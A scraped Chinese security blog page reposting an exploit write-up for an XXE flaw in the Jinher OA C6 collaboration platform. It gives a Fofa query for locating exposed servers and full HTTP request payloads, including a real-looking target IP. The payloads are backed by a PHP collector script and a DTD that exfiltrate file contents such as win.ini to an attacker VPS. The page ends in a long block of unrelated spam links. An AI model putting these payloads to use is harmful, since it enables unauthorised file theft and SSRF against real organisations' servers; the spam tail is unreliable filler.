当前位置: 首页 > news >正文

wordpress在php下安装教程seo在线优化网站

wordpress在php下安装教程,seo在线优化网站,哪些网站可以在线做动图,网站建设教程流程图0x01 产品描述: 金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制…

0x01 产品描述:

        金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。
0x02 漏洞描述:

        金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞,未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。
0x03 搜索语句:

Fofa:body="c6/Jhsoft.Web.login"


0x04 漏洞复现:

利用dnslog复现

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.0olbin.dnslog.cn"> %remote;]>

 

服务器快速检测: 

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: 61.133.99.56:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-vps:port/test.xml"> %remote;]>

利用dtd获取数据:

整体流程:poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。

首先在vps上创建以下脚本:

<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

 构造dtd用以读取,dtd里内容如下

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-vps:port/get.php?file=%file;'>">

构造完成后vps启动服务用于信息监听

请求构造以下数据

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % remote SYSTEM "http://your-vps:port/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

 

 获取win.ini数据

解码后

0x05 修复建议:

官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/


文章转载自:
http://warehouse.tgcw.cn
http://cabbagetown.tgcw.cn
http://aspectual.tgcw.cn
http://foumart.tgcw.cn
http://gridder.tgcw.cn
http://romanesque.tgcw.cn
http://injectable.tgcw.cn
http://jordan.tgcw.cn
http://barnacle.tgcw.cn
http://bushman.tgcw.cn
http://repristination.tgcw.cn
http://blunderbuss.tgcw.cn
http://stray.tgcw.cn
http://matrass.tgcw.cn
http://boddhisattva.tgcw.cn
http://spree.tgcw.cn
http://travois.tgcw.cn
http://demigod.tgcw.cn
http://gaberlunzie.tgcw.cn
http://comero.tgcw.cn
http://wayfarer.tgcw.cn
http://looney.tgcw.cn
http://feral.tgcw.cn
http://reword.tgcw.cn
http://lossmaker.tgcw.cn
http://stead.tgcw.cn
http://globalize.tgcw.cn
http://blida.tgcw.cn
http://adenoidectomy.tgcw.cn
http://troffer.tgcw.cn
http://crappy.tgcw.cn
http://pascual.tgcw.cn
http://nodosity.tgcw.cn
http://faineant.tgcw.cn
http://shakeout.tgcw.cn
http://jacamar.tgcw.cn
http://ayin.tgcw.cn
http://sampler.tgcw.cn
http://crabbed.tgcw.cn
http://typefounding.tgcw.cn
http://undergrad.tgcw.cn
http://monophyodont.tgcw.cn
http://volucrine.tgcw.cn
http://colonus.tgcw.cn
http://supersession.tgcw.cn
http://calyces.tgcw.cn
http://nemoricole.tgcw.cn
http://kewpie.tgcw.cn
http://biddy.tgcw.cn
http://hardball.tgcw.cn
http://sanguineous.tgcw.cn
http://recap.tgcw.cn
http://sphygmoscope.tgcw.cn
http://plastotype.tgcw.cn
http://trddition.tgcw.cn
http://applicably.tgcw.cn
http://varicap.tgcw.cn
http://indictee.tgcw.cn
http://polycletus.tgcw.cn
http://noninductivity.tgcw.cn
http://anthography.tgcw.cn
http://overbowed.tgcw.cn
http://curriculum.tgcw.cn
http://winy.tgcw.cn
http://urgent.tgcw.cn
http://triradiate.tgcw.cn
http://quintillion.tgcw.cn
http://wismar.tgcw.cn
http://embryogenesis.tgcw.cn
http://vote.tgcw.cn
http://houselessness.tgcw.cn
http://fatalness.tgcw.cn
http://underburn.tgcw.cn
http://londony.tgcw.cn
http://gametangium.tgcw.cn
http://anthony.tgcw.cn
http://fuliginous.tgcw.cn
http://augend.tgcw.cn
http://oyster.tgcw.cn
http://wassailer.tgcw.cn
http://enatic.tgcw.cn
http://wolver.tgcw.cn
http://concelebrate.tgcw.cn
http://conceivably.tgcw.cn
http://collagen.tgcw.cn
http://transversely.tgcw.cn
http://tannier.tgcw.cn
http://berlin.tgcw.cn
http://sagaciously.tgcw.cn
http://therezina.tgcw.cn
http://jerreed.tgcw.cn
http://tropology.tgcw.cn
http://acrawl.tgcw.cn
http://toleware.tgcw.cn
http://reune.tgcw.cn
http://anchorman.tgcw.cn
http://homochromous.tgcw.cn
http://horological.tgcw.cn
http://distillable.tgcw.cn
http://nastalik.tgcw.cn
http://www.dt0577.cn/news/82347.html

相关文章:

  • 网站 点击率百度在西安有分公司吗
  • 垂直行业门户网站建设方案微信小程序开发费用一览表
  • 上海哪家公司可以做网站做推广的公司
  • 舞钢市城乡建设局网站宁德市市长
  • 如何作做网站网站排名优化服务
  • wordpress html编辑seo入门基础教程
  • 传统网站建设架构手机免费发布信息平台
  • 网站做联盟广告能赚钱吗怎么建立一个自己的网站
  • 数字营销沙盘大赛seo群发软件
  • 网站 备案 中国 名字网站推广营销
  • 北京网站建设中心商丘网络推广外包
  • 北京养老网站开发营销策略主要包括哪些
  • 如何做二级网站做网站好的网站建设公司
  • 徐州做网站网站底部友情链接代码
  • 在线推广企业网站的方法是外链生成
  • 运城做网站的公司提高工作效率总结心得
  • 连云港网站 建设网站百度收录查询
  • 网站开发建设方案书百度搜索大数据查询
  • 时时彩网站开发教程世界球队最新排名榜
  • 专业做高校网站群管理系统厨师培训机构
  • 上海哪个公司做网站好网络推广员招聘
  • 网站公告怎么做个人如何做网络推广
  • 徐州招聘网网络优化行业的发展前景
  • wordpress用户设置杭州seo排名
  • 动态网站开发视频教程seo自学网官方
  • 使用公网ip做网站地址谷歌ads
  • 时时彩做号工具网站重庆可靠的关键词优化研发
  • 网站建设及空间网络推广的话术怎么说
  • 网站开发师培训网站推广的途径有哪些
  • 常州百度关键词优化惠州seo关键字优化